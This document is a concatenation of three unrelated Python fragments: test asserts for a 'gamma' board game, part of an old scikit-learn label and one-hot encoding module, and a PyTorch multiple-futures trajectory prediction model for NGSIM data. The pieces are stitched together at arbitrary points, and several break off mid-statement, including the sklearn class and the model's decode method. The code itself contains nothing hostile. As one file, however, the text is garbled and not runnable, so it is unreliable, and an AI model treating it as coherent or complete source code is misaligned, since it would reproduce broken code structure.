assert gamma_move(board, 1, 4, 2) == 0
assert gamma_move(board, 2, 3, 0) == 0
assert gamma_move(board, 2, 0, 5) == 0
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_move(board, 3, 1, 7) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_move(board, 5, 6, 6) == 0
assert gamma_free_fields(board, 5) == 29
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_move(board, 2, 0, 7) == 1
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_move(board, 4, 5, 3) == 0
assert gamma_move(board, 4, 6, 1) == 1
assert gamma_busy_fields(board, 4) == 7
assert gamma_free_fields(board, 4) == 9
assert gamma_move(board, 5, 4, 0) == 0
assert gamma_move(board, 1, 4, 6) == 1
assert gamma_move(board, 1, 4, 7) == 1
assert gamma_move(board, 2, 1, 7) == 1
assert gamma_move(board, 2, 3, 1) == 0
assert gamma_move(board, 3, 4, 3) == 0
assert gamma_move(board, 4, 3, 7) == 0
assert gamma_move(board, 4, 6, 6) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 4, 0) == 0
assert gamma_move(board, 5, 5, 2) == 1
assert gamma_move(board, 1, 2, 2) == 0
assert gamma_move(board, 2, 0, 5) == 0
assert gamma_move(board, 2, 2, 4) == 1
assert gamma_busy_fields(board, 2) == 6
assert gamma_golden_move(board, 2, 1, 6) == 1
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_move(board, 4, 7, 2) == 0
assert gamma_move(board, 5, 5, 4) == 0
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_move(board, 1, 2, 3) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_free_fields(board, 1) == 22
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 3, 1) == 0
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 2, 0, 7) == 0
assert gamma_free_fields(board, 2) == 22
assert gamma_move(board, 3, 5, 3) == 0
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_move(board, 4, 5, 0) == 1
assert gamma_move(board, 4, 0, 3) == 0
assert gamma_move(board, 5, 2, 6) == 0
assert gamma_move(board, 5, 3, 1) == 0
assert gamma_move(board, 2, 4, 5) == 1
assert gamma_golden_move(board, 2, 0, 0) == 0
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_move(board, 4, 0, 0) == 0
board898449385 = gamma_board(board)
assert board898449385 is not None
assert board898449385 == ("22.213.\n"
".2411.4\n"
"134.242\n"
".22.51.\n"
"..5....\n"
".3...5.\n"
"3.35544\n"
"4335145\n")
del board898449385
board898449385 = None
assert gamma_move(board, 5, 4, 5) == 0
assert gamma_move(board, 1, 3, 3) == 1
assert gamma_free_fields(board, 1) == 9
board714401105 = gamma_board(board)
assert board714401105 is not None
assert board714401105 == ("22.213.\n"
".2411.4\n"
"134.242\n"
".22.51.\n"
"..51...\n"
".3...5.\n"
"3.35544\n"
"4335145\n")
del board714401105
board714401105 = None
assert gamma_move(board, 2, 2, 7) == 1
assert gamma_move(board, 3, 2, 2) == 1
assert gamma_move(board, 4, 3, 4) == 0
assert gamma_move(board, 4, 3, 0) == 0
assert gamma_move(board, 5, 3, 0) == 0
assert gamma_busy_fields(board, 5) == 7
assert gamma_move(board, 1, 6, 0) == 0
assert gamma_move(board, 1, 6, 5) == 0
assert gamma_move(board, 2, 6, 5) == 0
assert gamma_busy_fields(board, 2) == 9
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 3, 0) == 0
assert gamma_busy_fields(board, 3) == 8
assert gamma_move(board, 4, 3, 0) == 0
assert gamma_move(board, 5, 4, 3) == 1
assert gamma_move(board, 5, 5, 7) == 0
assert gamma_golden_possible(board, 5) == 1
assert gamma_move(board, 1, 7, 6) == 0
assert gamma_move(board, 1, 0, 7) == 0
assert gamma_move(board, 2, 7, 6) == 0
assert gamma_move(board, 2, 1, 5) == 0
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 3, 5, 3) == 1
assert gamma_busy_fields(board, 3) == 9
assert gamma_move(board, 4, 1, 1) == 0
assert gamma_move(board, 4, 1, 4) == 0
assert gamma_move(board, 5, 5, 0) == 0
assert gamma_move(board, 5, 4, 6) == 0
assert gamma_free_fields(board, 5) == 5
assert gamma_golden_possible(board, 5) == 1
assert gamma_golden_move(board, 5, 5, 2) == 0
board392075440 = gamma_board(board)
assert board392075440 is not None
assert board392075440 == ("222213.\n"
".2411.4\n"
"134.242\n"
".22.51.\n"
"..5153.\n"
".33..5.\n"
"3.35544\n"
"4335145\n")
del board392075440
board392075440 = None
assert gamma_move(board, 1, 5, 1) == 0
assert gamma_move(board, 2, 7, 6) == 0
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_golden_move(board, 5, 1, 6) == 0
assert gamma_move(board, 1, 5, 3) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 6, 0) == 0
assert gamma_move(board, 3, 6, 3) == 1
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_golden_move(board, 4, 3, 6) == 1
assert gamma_move(board, 5, 3, 1) == 0
assert gamma_move(board, 5, 1, 6) == 0
assert gamma_move(board, 1, 0, 2) == 0
assert gamma_move(board, 1, 6, 4) == 1
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 4, 3, 1) == 0
assert gamma_move(board, 5, 7, 6) == 0
assert gamma_busy_fields(board, 5) == 8
assert gamma_golden_possible(board, 5) == 1
assert gamma_move(board, 1, 2, 7) == 0
assert gamma_move(board, 1, 0, 6) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 2, 6) == 0
assert gamma_move(board, 2, 3, 4) == 1
assert gamma_free_fields(board, 2) == 4
assert gamma_move(board, 3, 3, 7) == 0
assert gamma_move(board, 3, 0, 0) == 0
assert gamma_golden_possible(board, 3) == 1
board687132456 = gamma_board(board)
assert board687132456 is not None
assert board687132456 == ("222213.\n"
"12441.4\n"
"134.242\n"
".222511\n"
"2.51533\n"
".33..5.\n"
"3.35544\n"
"4335145\n")
del board687132456
board687132456 = None
assert gamma_move(board, | |
----------
n_values : 'auto', int or array of int
Number of values per feature.
'auto' : determine value range from training data.
int : maximum value for all features.
array : maximum value per feature.
dtype : number type, default=np.float
Desired dtype of output.
Attributes
----------
`active_features_` : array
Indices for active features, meaning values that actually occur in the
training set. Only available when n_values is ``'auto'``.
`feature_indices_` : array of shape (n_features,)
Indices to feature ranges. Feature ``i`` in the original data is mapped
to features ``feature_indices_[i]`` to ``feature_indices_[i+1]``
(and potentially masked by `active_features_` afterwards)
`n_values_` : array of shape (n_features,)
Maximum number of values per feature.
Examples
--------
Given a dataset with three features and two samples, we let the encoder
find the maximum value per feature and transform the data to a binary
one-hot encoding.
>>> from sklearn.preprocessing import OneHotEncoder
>>> enc = OneHotEncoder()
>>> enc.fit([[0, 0, 3], [1, 1, 0], [0, 2, 1], [1, 0, 2]])
OneHotEncoder(dtype=<type 'float'>, n_values='auto')
>>> enc.n_values_
array([2, 3, 4])
>>> enc.feature_indices_
array([0, 2, 5, 9])
>>> enc.transform([[0, 1, 1]]).toarray()
array([[ 1., 0., 0., 1., 0., 0., 1., 0., 0.]])
See also
--------
    LabelEncoder : encodes arbitrary class labels as integers between 0
        and n_classes-1.
sklearn.feature_extraction.DictVectorizer : performs a one-hot encoding of
dictionary items (also handles string-valued features).
"""
def __init__(self, n_values="auto", dtype=np.float):
self.n_values = n_values
self.dtype = dtype
def fit(self, X, y=None):
"""Fit OneHotEncoder to X.
Parameters
----------
X : array-like, shape=(n_samples, n_feature)
Input array of type int.
Returns
-------
self
"""
self.fit_transform(X)
return self
def fit_transform(self, X, y=None):
"""Fit OneHotEncoder to X, then transform X.
Equivalent to self.fit(X).transform(X), but more convenient and more
efficient. See fit for the parameters, transform for the return value.
"""
X = check_arrays(X, sparse_format='dense', dtype=np.int)[0]
if np.any(X < 0):
raise ValueError("X needs to contain only non-negative integers.")
n_samples, n_features = X.shape
if self.n_values == 'auto':
n_values = np.max(X, axis=0) + 1
elif isinstance(self.n_values, numbers.Integral):
n_values = np.empty(n_features, dtype=np.int)
n_values.fill(self.n_values)
else:
try:
n_values = np.asarray(self.n_values, dtype=int)
except (ValueError, TypeError):
raise TypeError("Wrong type for parameter `n_values`."
" Expected 'auto', int or array of ints, got %r"
% type(X))
if n_values.ndim < 1 or n_values.shape[0] != X.shape[1]:
raise ValueError("Shape mismatch: if n_values is "
"an array, it has to be of shape (n_features,).")
self.n_values_ = n_values
n_values = np.hstack([[0], n_values])
indices = np.cumsum(n_values)
self.feature_indices_ = indices
column_indices = (X + indices[:-1]).ravel()
row_indices = np.repeat(np.arange(n_samples, dtype=np.int32),
n_features)
data = np.ones(n_samples * n_features)
out = sp.coo_matrix((data, (row_indices, column_indices)),
shape=(n_samples, indices[-1]), dtype=self.dtype).tocsr()
if self.n_values == 'auto':
mask = np.array(out.sum(axis=0)).ravel() != 0
active_features = np.where(mask)[0]
out = out[:, active_features]
self.active_features_ = active_features
return out
def transform(self, X):
"""Transform X using one-hot encoding.
Parameters
----------
X : array-like, shape=(n_samples, feature_indices_[-1])
Input array of type int.
Returns
-------
X_out : sparse matrix, dtype=int
Transformed input.
"""
X = check_arrays(X, sparse_format='dense', dtype=np.int)[0]
if np.any(X < 0):
raise ValueError("X needs to contain only non-negative integers.")
n_samples, n_features = X.shape
indices = self.feature_indices_
if n_features != indices.shape[0] - 1:
raise ValueError("X has different shape than during fitting."
" Expected %d, got %d."
% (indices.shape[0] - 1, n_features))
n_values_check = np.max(X, axis=0) + 1
if (n_values_check > self.n_values_).any():
raise ValueError("Feature out of bounds. Try setting n_values.")
column_indices = (X + indices[:-1]).ravel()
row_indices = np.repeat(np.arange(n_samples, dtype=np.int32),
n_features)
data = np.ones(n_samples * n_features)
out = sp.coo_matrix((data, (row_indices, column_indices)),
shape=(n_samples, indices[-1]), dtype=self.dtype).tocsr()
if self.n_values == 'auto':
out = out[:, self.active_features_]
return out
class LabelEncoder(BaseEstimator, TransformerMixin):
    """Encode labels with value between 0 and n_classes-1.

    Attributes
    ----------
    `classes_`: array of shape [n_class]
        Holds the label for each class.

    Examples
    --------
    `LabelEncoder` can be used to normalize labels.

    >>> from sklearn import preprocessing
    >>> le = preprocessing.LabelEncoder()
    >>> le.fit([1, 2, 2, 6])
    LabelEncoder()
    >>> le.classes_
    array([1, 2, 6])
    >>> le.transform([1, 1, 2, 6]) #doctest: +ELLIPSIS
    array([0, 0, 1, 2]...)
    >>> le.inverse_transform([0, 0, 1, 2])
    array([1, 1, 2, 6])

    It can also be used to transform non-numerical labels (as long as they are
    hashable and comparable) to numerical labels.

    >>> le = preprocessing.LabelEncoder()
    >>> le.fit(["paris", "paris", "tokyo", "amsterdam"])
    LabelEncoder()
    >>> list(le.classes_)
    ['amsterdam', 'paris', 'tokyo']
    >>> le.transform(["tokyo", "tokyo", "paris"]) #doctest: +ELLIPSIS
    array([2, 2, 1]...)
    >>> list(le.inverse_transform([2, 2, 1]))
    ['tokyo', 'tokyo', 'paris']
    """

    def _check_fitted(self):
        # fit()/fit_transform() create classes_; absence means not fitted.
        if not hasattr(self, "classes_"):
            # Bug fix: message previously said "LabelNormalizer", which is
            # not this class's name.
            raise ValueError("LabelEncoder was not fitted yet.")

    def fit(self, y):
        """Fit label encoder

        Parameters
        ----------
        y : array-like of shape [n_samples]
            Target values.

        Returns
        -------
        self : returns an instance of self.
        """
        self.classes_ = np.unique(y)
        return self

    def fit_transform(self, y):
        """Fit label encoder and return encoded labels

        Parameters
        ----------
        y : array-like of shape [n_samples]
            Target values.

        Returns
        -------
        y : array-like of shape [n_samples]
        """
        # `unique` here is presumably the project's compatibility wrapper
        # (np.unique with return_inverse for old numpy) - verify the import
        # at the top of the file.
        self.classes_, y = unique(y, return_inverse=True)
        return y

    def transform(self, y):
        """Transform labels to normalized encoding.

        Parameters
        ----------
        y : array-like of shape [n_samples]
            Target values.

        Returns
        -------
        y : array-like of shape [n_samples]

        Raises
        ------
        ValueError
            If y contains labels that were not seen during fit.
        """
        self._check_fitted()
        classes = np.unique(y)
        if len(np.intersect1d(classes, self.classes_)) < len(classes):
            diff = np.setdiff1d(classes, self.classes_)
            raise ValueError("y contains new labels: %s" % str(diff))
        # classes_ is sorted (np.unique), so searchsorted yields the index.
        return np.searchsorted(self.classes_, y)

    def inverse_transform(self, y):
        """Transform labels back to original encoding.

        Parameters
        ----------
        y : numpy array of shape [n_samples]
            Target values.

        Returns
        -------
        y : numpy array of shape [n_samples]
        """
        self._check_fitted()
        y = np.asarray(y)
        return self.classes_[y]
class LabelBinarizer(BaseEstimator, TransformerMixin):
"""Binarize labels in a one-vs-all fashion
Several regression and binary classification algorithms are
available in the scikit. A simple way to extend these algorithms
to the multi-class classification case is to use the so-called
one-vs-all scheme.
At learning time, this simply consists in learning one regressor
or binary classifier per class. In doing so, one needs to convert
multi-class labels to binary labels (belong or does not belong
to the class). LabelBinarizer makes this process easy with the
transform method.
At prediction time, one assigns the class for which the corresponding
model gave the greatest confidence. LabelBinarizer makes this easy
with the inverse_transform method.
Parameters
----------
neg_label: int (default: 0)
Value with which negative labels must be encoded.
pos_label: int (default: 1)
Value with which positive labels must be encoded.
Attributes
----------
`classes_`: array of shape [n_class]
Holds the label for each class.
Examples
--------
>>> from sklearn import preprocessing
>>> lb = preprocessing.LabelBinarizer()
>>> lb.fit([1, 2, 6, 4, 2])
LabelBinarizer(neg_label=0, pos_label=1)
>>> lb.classes_
array([1, 2, 4, 6])
>>> lb.transform([1, 6])
array([[1, 0, 0, 0],
[0, 0, 0, 1]])
>>> lb.fit_transform([(1, 2), (3,)])
array([[1, 1, 0],
[0, 0, 1]])
>>> lb.classes_
array([1, 2, 3])
"""
def __init__(self, neg_label=0, pos_label=1):
if neg_label >= pos_label:
raise ValueError("neg_label must be strictly less than pos_label.")
self.neg_label = neg_label
self.pos_label = pos_label
def _check_fitted(self):
if not hasattr(self, "classes_"):
raise ValueError("LabelBinarizer was not fitted yet.")
def fit(self, y):
"""Fit label binarizer
Parameters
----------
y : numpy array of shape [n_samples] or sequence of sequences
Target values. In the multilabel case the nested sequences can
have variable lengths.
Returns
-------
self : returns an instance of self.
"""
self.multilabel = _is_multilabel(y)
if self.multilabel:
self.indicator_matrix_ = _is_label_indicator_matrix(y)
if self.indicator_matrix_:
self.classes_ = np.arange(y.shape[1])
else:
self.classes_ = np.array(sorted(set.union(*map(set, y))))
else:
self.classes_ = np.unique(y)
return self
def transform(self, y):
"""Transform multi-class labels to binary labels
The output of transform is sometimes referred to by some authors as the
1-of-K coding scheme.
Parameters
----------
y : numpy array of shape [n_samples] or sequence of sequences
Target values. In the multilabel case the nested sequences can
have variable lengths.
Returns
-------
Y : numpy array of shape [n_samples, n_classes]
"""
self._check_fitted()
if self.multilabel or len(self.classes_) > 2:
if _is_label_indicator_matrix(y):
# nothing to do as y is already a label indicator matrix
return y
Y = np.zeros((len(y), len(self.classes_)), dtype=np.int)
else:
Y = np.zeros((len(y), 1), dtype=np.int)
Y += self.neg_label
y_is_multilabel = _is_multilabel(y)
if y_is_multilabel and not self.multilabel:
raise ValueError("The object was not " +
"fitted with multilabel input!")
elif self.multilabel:
if not _is_multilabel(y):
raise ValueError("y should be a list of label lists/tuples,"
"got | |
# multiple_futures_prediction/model_ngsim.py (repo: LaudateCorpus1/ml-multiple-futures-prediction)
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2019-2020 Apple Inc. All Rights Reserved.
#
from typing import List, Set, Dict, Tuple, Optional, Union, Any
import torch
import torch.nn as nn
from multiple_futures_prediction.my_utils import *
# Multiple Futures Prediction Network
class mfpNet(nn.Module):
    def __init__(self, args: Dict) -> None:
        """Build the MFP network from a configuration dict.

        args supplies encoder/decoder sizes, mode count, GRU/bi-direction
        flags, and context-image usage. NOTE: submodules are registered in a
        fixed order; changing it would break state_dict compatibility.
        """
        super(mfpNet, self).__init__() #type: ignore
        self.use_cuda = args['use_cuda']
        self.encoder_size = args['encoder_size']
        self.decoder_size = args['decoder_size']
        # Prediction horizon length after temporal subsampling.
        self.out_length = args['fut_len_orig_hz']//args['subsampling']
        self.dyn_embedding_size = args['dyn_embedding_size']
        self.input_embedding_size = args['input_embedding_size']
        self.nbr_atten_embedding_size = args['nbr_atten_embedding_size']
        self.st_enc_hist_size = self.nbr_atten_embedding_size
        self.st_enc_pos_size = args['dec_nbr_enc_size']
        self.use_gru = args['use_gru']
        self.bi_direc = args['bi_direc']
        self.use_context = args['use_context']
        self.modes = args['modes']
        self.use_forcing = args['use_forcing'] # 1: Teacher forcing. 2:classmates forcing.
        # GRU encoder uses 2 layers, so its flattened hidden state is 2x.
        self.hidden_fac = 2 if args['use_gru'] else 1
        self.bi_direc_fac = 2 if args['bi_direc'] else 1
        self.dec_fac = 2 if args['bi_direc'] else 1
        # RBF-attention state encoder over the (flattened) encoder hidden state.
        self.init_rbf_state_enc( in_dim=self.encoder_size*self.hidden_fac )
        self.posi_enc_dim = self.st_enc_pos_size
        self.posi_enc_ego_dim = 2
        # Input embedding layer
        self.ip_emb = torch.nn.Linear(2,self.input_embedding_size) #type: ignore
        # Encoding RNN.
        if not self.use_gru:
            self.enc_lstm = torch.nn.LSTM(self.input_embedding_size,self.encoder_size,1) # type: ignore
        else:
            self.num_layers=2
            self.enc_lstm = torch.nn.GRU(self.input_embedding_size,self.encoder_size, # type: ignore
                                         num_layers=self.num_layers, bidirectional=False)
        # Dynamics embeddings.
        self.dyn_emb = torch.nn.Linear(self.encoder_size*self.hidden_fac, self.dyn_embedding_size) #type: ignore
        context_feat_size = 64 if self.use_context else 0
        # One decoder RNN and one output head per latent mode.
        self.dec_lstm = []
        self.op = []
        for k in range(self.modes):
            if not self.use_gru:
                self.dec_lstm.append( torch.nn.LSTM(self.nbr_atten_embedding_size + self.dyn_embedding_size + #type: ignore
                                      context_feat_size+self.posi_enc_dim+self.posi_enc_ego_dim, self.decoder_size) )
            else:
                self.num_layers=2
                self.dec_lstm.append( torch.nn.GRU(self.nbr_atten_embedding_size + self.dyn_embedding_size + context_feat_size+self.posi_enc_dim+self.posi_enc_ego_dim, # type: ignore
                                      self.decoder_size, num_layers=self.num_layers, bidirectional=self.bi_direc ))
            # Output head: 5 values per step (presumably bivariate Gaussian
            # parameters mu_x, mu_y, sigma_x, sigma_y, rho - confirm in decode).
            self.op.append( torch.nn.Linear(self.decoder_size*self.dec_fac, 5) ) #type: ignore
            self.op[k] = self.op[k]
            self.dec_lstm[k] = self.dec_lstm[k]
        # Wrap in ModuleList so per-mode modules are registered parameters.
        self.dec_lstm = torch.nn.ModuleList(self.dec_lstm) # type: ignore
        self.op = torch.nn.ModuleList(self.op ) # type: ignore
        # Classifier over the latent modes.
        self.op_modes = torch.nn.Linear(self.nbr_atten_embedding_size + self.dyn_embedding_size + context_feat_size, self.modes) #type: ignore
        # Nonlinear activations.
        self.leaky_relu = torch.nn.LeakyReLU(0.1) #type: ignore
        self.relu = torch.nn.ReLU() #type: ignore
        self.softmax = torch.nn.Softmax(dim=1) #type: ignore
        if self.use_context:
            # Small CNN tower that turns the context image into a 64-d feature.
            self.context_conv = torch.nn.Conv2d(3, 16, kernel_size=3, stride=2) #type: ignore
            self.context_conv2 = torch.nn.Conv2d(16, 16, kernel_size=3, stride=2) #type: ignore
            self.context_maxpool = torch.nn.MaxPool2d(kernel_size=(4,2)) #type: ignore
            self.context_conv3 = torch.nn.Conv2d(16, 16, kernel_size=3, stride=2) #type: ignore
            # 16*20*3 assumes a fixed input image size - TODO confirm upstream.
            self.context_fc = torch.nn.Linear(16*20*3, context_feat_size) #type: ignore
    def init_rbf_state_enc(self, in_dim: int ) -> None:
        """Initialize the dynamic attentional RBF encoder.

        Creates the key network, the learnable slot keys, and the two
        aggregation networks used by rbf_state_enc_hist_fwd/pos_fwd.

        Args:
          in_dim is the input dim of the observation.
        """
        self.sec_in_dim = in_dim
        # Extra 2 dims for the relative (neighbor - agent) position fed to the key net.
        self.extra_pos_dim = 2
        self.sec_in_pos_dim = 2
        self.sec_key_dim = 8
        self.sec_key_hidden_dim = 32
        self.sec_hidden_dim = 32
        # RBF bandwidth for the exp(-scale * ||key - slot||) attention.
        self.scale = 1.0
        self.slot_key_scale = 1.0
        self.num_slots = 8
        self.slot_keys = []
        # Network for computing the 'key'
        self.sec_key_net = torch.nn.Sequential( #type: ignore
            torch.nn.Linear(self.sec_in_dim+self.extra_pos_dim, self.sec_key_hidden_dim),
            torch.nn.ReLU(),
            torch.nn.Linear(self.sec_key_hidden_dim, self.sec_key_dim)
        )
        # Learnable slot keys, randomly initialized; one per attention slot.
        for ss in range(self.num_slots):
            self.slot_keys.append( torch.nn.Parameter( self.slot_key_scale*torch.randn( self.sec_key_dim, 1, dtype=torch.float32) ) ) #type: ignore
        # ParameterList registers the slot keys with the optimizer.
        self.slot_keys = torch.nn.ParameterList( self.slot_keys ) # type: ignore
        # Network for encoding a scene-level contextual feature.
        self.sec_hist_net = torch.nn.Sequential( #type: ignore
            torch.nn.Linear(self.sec_in_dim*self.num_slots, self.sec_hidden_dim),
            torch.nn.ReLU(),
            torch.nn.Linear(self.sec_hidden_dim, self.sec_hidden_dim),
            torch.nn.ReLU(),
            torch.nn.Linear(self.sec_hidden_dim, self.st_enc_hist_size)
        )
        # Encoder position of other's into a feature network, input should be normalized to ref_pos.
        self.sec_pos_net = torch.nn.Sequential( #type: ignore
            torch.nn.Linear(self.sec_in_pos_dim*self.num_slots, self.sec_hidden_dim),
            torch.nn.ReLU(),
            torch.nn.Linear(self.sec_hidden_dim, self.sec_hidden_dim),
            torch.nn.ReLU(),
            torch.nn.Linear(self.sec_hidden_dim, self.st_enc_pos_size)
        )
    def rbf_state_enc_get_attens(self, nbrs_enc: torch.Tensor, ref_pos: torch.Tensor, nbrs_info_this: List ) -> List[torch.Tensor]:
        """Computing the attention over other agents.

        Neighbors of all agents are packed contiguously along dim 0 of
        nbrs_enc; `counter` walks that packing in the same order as
        nbrs_info_this.

        Args:
          nbrs_info_this is a list of list of (nbr_batch_ind, nbr_id, nbr_ctx_ind)
        Returns:
          attention weights over the neighbors (one [num_slots x num_nbrs]
          tensor per agent).
        """
        # One entry in nbrs_info_this per agent (row of ref_pos).
        assert len(nbrs_info_this) == ref_pos.shape[0]
        if self.extra_pos_dim > 0:
            # Append each neighbor's position relative to its agent to the key input.
            pos_enc = torch.zeros(nbrs_enc.shape[0],2, device=nbrs_enc.device)
            counter = 0
            for n in range(len(nbrs_info_this)):
                for nbr in nbrs_info_this[n]:
                    # nbr[0] is the neighbor's batch index into ref_pos.
                    pos_enc[counter,:] = ref_pos[nbr[0],:] - ref_pos[n,:]
                    counter += 1
            Key = self.sec_key_net( torch.cat( (nbrs_enc,pos_enc),dim=1) )
            # e.g. num_agents by self.sec_key_dim
        else:
            Key = self.sec_key_net( nbrs_enc ) # e.g. num_agents by self.sec_key_dim
        # RBF similarity between each key and each learnable slot key.
        attens0 = []
        for slot in self.slot_keys:
            attens0.append( torch.exp( -self.scale*(Key-torch.t(slot)).norm(dim=1)) )
        Atten = torch.stack(attens0, dim=0) # e.g. num_keys x num_agents
        # Split the packed attention columns back into per-agent chunks.
        attens = []
        counter = 0
        for n in range(len(nbrs_info_this)):
            list_of_nbrs = nbrs_info_this[n]
            counter2 = counter+len(list_of_nbrs)
            attens.append( Atten[:, counter:counter2 ] )
            counter = counter2
        return attens
def rbf_state_enc_hist_fwd(self, attens: List, nbrs_enc: torch.Tensor, nbrs_info_this: List) -> torch.Tensor:
"""Computes dynamic state encoding.
Computes dynica state encoding with precomputed attention tensor and the
RNN based encoding.
Args:
attens is a list of [ [slots x num_neighbors]]
nbrs_enc is num_agents by input_dim
Returns:
feature vector
"""
out = []
counter = 0
for n in range(len(nbrs_info_this)):
list_of_nbrs = nbrs_info_this[n]
if len(list_of_nbrs) > 0:
counter2 = counter+len(list_of_nbrs)
nbr_feat = nbrs_enc[counter:counter2,:]
out.append( torch.mm( attens[n], nbr_feat ) )
counter = counter2
else:
out.append( torch.zeros(self.num_slots, nbrs_enc.shape[1] ).to(nbrs_enc.device) )
# if no neighbors found, use all zeros.
st_enc = torch.stack(out, dim=0).view(len(out),-1) # num_agents by slots*enc dim
return self.sec_hist_net(st_enc)
def rbf_state_enc_pos_fwd(self, attens: List, ref_pos: torch.Tensor, fut_t: torch.Tensor, flatten_inds: torch.Tensor, chunks: List) -> torch.Tensor:
"""Computes the features from dynamic attention for interactive rollouts.
Args:
attens is a list of [ [slots x num_neighbors]]
ref_pos should be (num_agents by 2)
Returns:
feature vector
"""
fut = fut_t + ref_pos #convert to 'global' frame
nbr_feat = torch.index_select( fut, 0, flatten_inds)
splits = torch.split(nbr_feat, chunks, dim=0) #type: ignore
out = []
for n, nbr_feat in enumerate(splits):
out.append( torch.mm( attens[n], nbr_feat - ref_pos[n,:] ) )
pos_enc = torch.stack(out, dim=0).view(len(attens),-1) # num_agents by slots*enc dim
return self.sec_pos_net(pos_enc)
def forward_mfp(self, hist:torch.Tensor, nbrs:torch.Tensor, masks:torch.Tensor, context:Any,
nbrs_info:List, fut:torch.Tensor, bStepByStep:bool,
use_forcing:Optional[Union[None,int]]=None) -> Tuple[List[torch.Tensor], Any]:
"""Forward propagation function for the MFP
Computes dynamic state encoding with precomputed attention tensor and the
RNN based encoding.
Args:
hist: Trajectory history.
nbrs: Neighbors.
masks: Neighbors mask.
context: contextual information in image form (if used).
nbrs_info: information as to which other agents are neighbors.
fut: Future Trajectory.
bStepByStep: During rollout, interactive or independent.
use_forcing: Teacher-forcing or classmate forcing.
Returns:
fut_pred: a list of predictions, one for each mode.
modes_pred: prediction over latent modes.
"""
use_forcing = self.use_forcing if use_forcing==None else use_forcing
# Normalize to reference position.
ref_pos = hist[-1,:,:]
hist = hist - ref_pos.view(1,-1,2)
# Encode history trajectories.
if isinstance(self.enc_lstm, torch.nn.modules.rnn.GRU):
_, hist_enc = self.enc_lstm(self.leaky_relu(self.ip_emb(hist)))
else:
_,(hist_enc,_) = self.enc_lstm(self.leaky_relu(self.ip_emb(hist))) #hist torch.Size([16, 128, 2])
if self.use_gru:
hist_enc = hist_enc.permute(1,0,2).contiguous()
hist_enc = self.leaky_relu(self.dyn_emb( hist_enc.view(hist_enc.shape[0], -1) ))
else:
hist_enc = self.leaky_relu(self.dyn_emb(hist_enc.view(hist_enc.shape[1],hist_enc.shape[2]))) #torch.Size([128, 32])
num_nbrs = sum([len(nbs) for nb_id, nbs in nbrs_info[0].items() ])
if num_nbrs > 0:
nbrs_ref_pos = nbrs[-1,:,:]
nbrs = nbrs - nbrs_ref_pos.view(1,-1,2) # normalize
# Forward pass for all neighbors.
if isinstance(self.enc_lstm, torch.nn.modules.rnn.GRU):
_, nbrs_enc = self.enc_lstm(self.leaky_relu(self.ip_emb(nbrs)))
else:
_, (nbrs_enc,_) = self.enc_lstm(self.leaky_relu(self.ip_emb(nbrs)))
if self.use_gru:
nbrs_enc = nbrs_enc.permute(1,0,2).contiguous()
nbrs_enc = nbrs_enc.view(nbrs_enc.shape[0], -1)
else:
nbrs_enc = nbrs_enc.view(nbrs_enc.shape[1], nbrs_enc.shape[2])
attens = self.rbf_state_enc_get_attens(nbrs_enc, ref_pos, nbrs_info[0])
nbr_atten_enc = self.rbf_state_enc_hist_fwd(attens, nbrs_enc, nbrs_info[0])
else: # if have no neighbors
attens = None # type: ignore
nbr_atten_enc = torch.zeros( 1, self.nbr_atten_embedding_size, dtype=torch.float32, device=masks.device )
if self.use_context: #context encoding
context_enc = self.relu(self.context_conv( context ))
context_enc = self.context_maxpool( self.context_conv2( context_enc ))
context_enc = self.relu(self.context_conv3(context_enc))
context_enc = self.context_fc( context_enc.view( context_enc.shape[0], -1) )
enc = torch.cat((nbr_atten_enc, hist_enc, context_enc),1)
else:
enc = torch.cat((nbr_atten_enc, hist_enc),1)
# e.g. nbr_atten_enc: [num_agents by 80], hist_enc: [num_agents by 32], enc would be [num_agents by 112]
######################################################################################################
modes_pred = None if self.modes==1 else self.softmax(self.op_modes(enc))
fut_pred = self.decode(enc, attens, nbrs_info[0], ref_pos, fut, bStepByStep, use_forcing)
return fut_pred, modes_pred
def decode(self, enc: torch.Tensor, attens:List, nbrs_info_this:List, ref_pos:torch.Tensor, fut:torch.Tensor, bStepByStep:bool, use_forcing:Any ) -> List[torch.Tensor]:
"""Decode the future trajectory using RNNs.
Given computed feature vector, decode the future with multimodes, using
dynamic attention and either interactive or non-interactive rollouts.
Args:
enc: encoded features, one per agent.
attens: attentional weights, list of objs, each with dimenstion of [8 x 4] (e.g.)
nbrs_info_this: information on who are the neighbors
ref_pos: the current postion (reference position) of the agents.
fut: future trajectory (only useful for teacher or classmate forcing)
bStepByStep: interactive or non-interactive rollout
use_forcing: 0: None. 1: Teacher-forcing. 2: classmate forcing.
Returns:
fut_pred: a list of predictions, one for each mode.
modes_pred: prediction over latent modes.
"""
if not bStepByStep: # Non-interactive rollouts
enc = enc.repeat(self.out_length, 1, 1)
